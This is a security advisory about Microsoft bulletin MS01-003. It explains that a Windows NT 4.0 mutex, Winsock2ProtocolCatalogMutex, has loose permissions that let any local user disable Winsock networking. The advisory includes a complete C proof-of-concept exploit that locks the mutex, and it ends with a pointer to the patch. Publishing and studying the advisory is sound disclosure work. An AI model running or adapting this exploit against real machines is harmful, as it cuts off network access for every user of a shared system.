COMMAND

    kernel

SYSTEMS AFFECTED

    WinNT 4.0

PROBLEM

    Following  is  based  on  a  Microsoft Security Bulletin MS01-003.
    Like  all  other   objects  under  Windows   NT  4.0,  mutexes   -
    synchronization objects  that govern  access to  resources -  have
    permissions  associated  with  them,  that  govern how they can be
    accessed.  However, a particular mutex used to govern access to  a
    networking resource has  inappropriately loose permissions.   This
    could enable  an attacker  who had  the ability  to run  code on a
    local  machine  to  monopolize  the  mutex, thereby preventing any
    other processes from using the resource that it controlled.   This
    would have the effect of preventing the machine from participating
    in the network.

    The  attacker  would  require  interactive  logon  access  to  the
    affected  machine.   This  significantly  limits  the scope of the
    vulnerability  because,  if  normal  security recommendations have
    been followed, unprivileged users will not be granted  interactive
    logon  rights  to  critical  machines  like servers.  Unprivileged
    users  typically   are  granted   interactive  logon   rights   to
    workstations and terminal servers.   However, a workstation  would
    not be a  tempting target for  an attacker, because  he could only
    use this vulnerability to deny  service to himself.  The  machines
    most likely to be affected would be terminal servers.

    MS id here a bit unclear about things at this point.  You do  need
    to execute the exploit on  the machine you are attacking,  but you
    don't need to log on interactively for it to work.  There are more
    than one  way to  do it,  one way  is like  you say,  to have  IIS
    execute it for you (which really  works).  So it's a local  attack
    - but it's not limited to interactive logons.  The way we see  it,
    Microsoft lumps  together interactive  logon, local  execution and
    physical access  (not counting  TSE) as  being almost  one and the
    same though out there in reality they are not.

    For more information about Mutex Objects, see

        http://msdn.microsoft.com/library/psdk/winbase/synchro_7t9v.htm

    Because  of  the  distributed  nature  of  Windows NT 4.0 Terminal
    Server  Edition,  it  is  more  susceptible to attack from within.
    Disgruntled  employees,  users  who  install  applications without
    approval or  forethought, etc,  all can  potentially cause  larger
    outages than those on their own Workstations.  The nature of  this
    vulnerability  is  such  that  all  users  of a Windows NT 4.0 TSE
    would  experience  an  outage  should  an  attack occur, since the
    vulnerability   affects   the   networking   components   of   the
    environment.   Web  Hosting  environments  which  permit  customer
    access via  Remote Desktop  programs (like  PCAnywhere), or permit
    customers to  install applications/services  and control  how they
    run, are  also at  higher risk  since such  users may  be able  to
    launch a rogue application interactively.

    The  attacker  would  require  interactive  logon  access  to  the
    affected machine.  Acknowledgment goes to Arne Vidstrom.  He added
    following.

    There is a mutex called Winsock2ProtocolCatalogMutex in Windows
    NT 4.0, to which  the Everyone group has  Full Control.  Any  user
    can  change  this  to  No  Access,  and  that disables all network
    connectivity through Winsock until the system is rebooted.

    Sample exploit code:

    /*
    /* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
    /*                        http://ntsecurity.nu
    /*
    /* - Disables all network connectivity through Winsock
    /* - Can be run from any account (e.g. an ordinary User account)
    /*
    */

    #include <windows.h>
    #include <aclapi.h>

    int main(void)
    {
            PSID pEveryoneSID;
            SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
            PACL pDacl;
            DWORD sizeNeeded;

            AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID);
            sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) + GetLengthSid(pEveryoneSID) - sizeof(DWORD);
            pDacl = (PACL) malloc(sizeNeeded);
            InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
            AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
            SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex", SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
            free(pDacl);
            return 0;
    }

SOLUTION

    A  patch  is  available  to  fix  this vulnerability.  Please read
    Security Bulletin MS01-003 at:

        http://www.microsoft.com/technet/security/bulletin/ms01-003.asp

    for information on obtaining this patch.